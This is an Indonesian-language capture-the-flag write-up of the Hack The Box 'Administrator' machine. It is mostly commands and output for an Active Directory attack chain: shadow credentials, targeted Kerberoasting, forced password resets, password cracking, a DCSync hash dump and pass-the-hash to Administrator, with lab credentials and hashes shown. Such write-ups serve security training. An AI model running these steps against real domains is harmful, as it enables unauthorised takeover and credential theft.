Administrator — HackTheBox Writeup

Posted on by joelindra

Halo semuanya! Pada kali ini gw akan membahas salah satu mesin Hack The Box, yaitu Administrator. Mesin ini fokus pada eksploitasi Active Directory dengan teknik-teknik seperti Shadow Credentials, GenericAll, dan DCSync privileges.

Scanning Awal

Seperti biasa, rutinitas yang kita lakukan adalah melakukan scanning terlebih dahulu pada target dengan menggunakan nmap:

└─# nmap -sCV 10.10.11.42 -Pn -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 02:15 EST
Nmap scan report for 10.10.11.42
Host is up (0.052s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-23 13:58:12Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Dari hasil scan, kita bisa melihat beberapa port standar Active Directory terbuka, termasuk:

  • Port 21: FTP Server
  • Port 53: DNS
  • Port 88: Kerberos
  • Port 389: LDAP
  • Port 445: SMB

Initial Access

Pada mesin ini, kita diberikan default credential:

  • Username: olivia
  • Password: ichliebedich

Login dengan WinRM

Kita gunakan credential ini untuk login menggunakan WinRM:

└─# netexec winrm 10.10.11.42 -u olivia -p ichliebedich
WINRM       10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\olivia:ichliebedich (Pwn3d!)

Enumeration dengan BloodHound

Collect Data

Kita akan mengumpulkan data domain menggunakan netexec:

└─# netexec ldap 10.10.11.42 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.10.11.42
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.42     389    DC               [+] administrator.htb\olivia:ichliebedich 
LDAP        10.10.11.42     389    DC               Resolved collection methods: rdp, session, dcom, objectprops, group, psremote, acl, localadmin, trusts, container                                                 
LDAP        10.10.11.42     389    DC               Done in 00M 05S
LDAP        10.10.11.42     389    DC               Compressing output into /root/.nxc/logs/DC_10.10.11.42_2025-02-23_021951_bloodhound.zip

Analisis BloodHound

Setelah mengupload file zip ke BloodHound, kita menemukan bahwa:

  • Olivia memiliki privilege GenericAll pada user Michael
  • Ini berarti kita bisa melakukan manipulasi pada akun Michael

Exploit Path 1: Michael (GenericAll)

Shadow Credentials Attack

Kita akan menggunakan PyWhisker untuk melakukan shadow credentials attack pada Michael:

└─# python3 pywhisker.py -d "administrator.htb" -u "olivia" -p 'ichliebedich'
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 30982685-a67d-6c0b-561e-3f1442b276
[*] Updating the msDS-KeyCredentialLink attribute of michael
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: mnKHswaS.pfx
[+] PFX exportiert nach: mnKHswaS.pfx
[i] Passwort für PFX: Dit0PmmbpqOrbQTSsA4M

Mendapatkan TGT dan Hash Kerberos

└─# python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'olivia' -p ichliebedich
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (michael)
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$0fd630c7<hash>
[VERBOSE] SPN removed successfully for (michael)

Karena cracking hash tidak berhasil, kita gunakan privilege GenericAll untuk langsung mengubah password Michael:

└─# bloodyAD -u "olivia" -p "ichliebedich" -d "Administrator.htb" --host "10.10.11.42" set password "Michael" "12345678"
[+] Password changed successfully!

Login sebagai Michael

└─# evil-winrm -i administrator.htb -u michael -p 12345678
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael

Exploit Path 2: Benjamin (ForceChangePassword)

Dari BloodHound, kita melihat Michael memiliki privilege ForceChangePassword pada Benjamin:

Mengubah Password Benjamin

└─# net rpc password benjamin 12345678 -U administrator.htb/michael%12345678 -S administrator.htb

Mencoba Akses FTP

Kita coba mengakses FTP yang sebelumnya terdeteksi:

└─# ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:root): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||63739|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.

Mendapatkan File Backup.psafe3

ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||63750|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************************|   952       45.09 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (44.86 KiB/s)

Crack Password Safe Database

└─# john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-02-23 09:40) 5.555g/s 45511p/s 45511c/s 45511C/s newzealand..whitetiger

Mendapatkan Credentials dari Password Safe

Dari Password Safe database, kita mendapatkan credentials:

  • Alexander = UrkIbago
  • Emily = UXLCI5iETUsI
  • Emma = WwANQWnmJnGV

User Flag: Emily

Kita login sebagai Emily untuk mendapatkan user flag:

└─# evil-winrm -i administrator.htb -u emily -p "UXLCI5iETUsI"
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
7a2c0d643bf50a0feb16a058937f9303

Exploit Path 3: Ethan (GenericWrite)

Dari BloodHound, kita melihat Emily memiliki privilege GenericWrite pada Ethan:

Shadow Credentials Attack pada Ethan

└─# python3 pywhisker.py -d administrator.htb -u emily -p "UXLCI5iETUsI"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: c36ede17-f520-9087-1768-0b6e34dff5
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object

Kerberoast Ethan

└─# python3 targetedKerberoast.py -u "emily" -p "UXLCI5iETUsI" -d "Administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$6d4310bbcf16a<hash>

Crack Hash Ethan

└─# john ethan.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2025-02-23 09:54)

Verifikasi Credential Ethan

└─# netexec smb administrator.htb -u ethan -p limpbizkit
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\ethan:limpbizkit

Privilege Escalation: DCSync Attack

Dari BloodHound, kita melihat Ethan memiliki privilege DCSync:

DCSync untuk Mendapatkan Hashes

└─# impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9c591d1cba2a649f23928a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::

Root Flag: Pass-the-Hash dengan Administrator

└─# evil-winrm -i administrator.htb -u administrator -H "3dc553ce4b9c591d1cba2a649f23928a"
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
dfed0cdd8bc1d204243011520a921207

Kesimpulan

Mesin Administrator adalah contoh yang bagus dari Active Directory attack chain yang memanfaatkan berbagai teknik:

  1. GenericAll privilege – Digunakan untuk mengeksploitasi Michael
  2. ForceChangePassword privilege – Digunakan untuk mengakses akun Benjamin
  3. Password Safe cracking – Mendapatkan credentials Emily
  4. GenericWrite privilege – Digunakan untuk mengeksploitasi Ethan
  5. DCSync privilege – Akhirnya digunakan untuk mendapatkan NTLM hash Administrator

Attack Chain Lengkap

Olivia (GenericAll) → Michael (ForceChangePassword) → Benjamin (FTP Access) → 
Password Safe → Emily (GenericWrite) → Ethan (DCSync) → Administrator

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts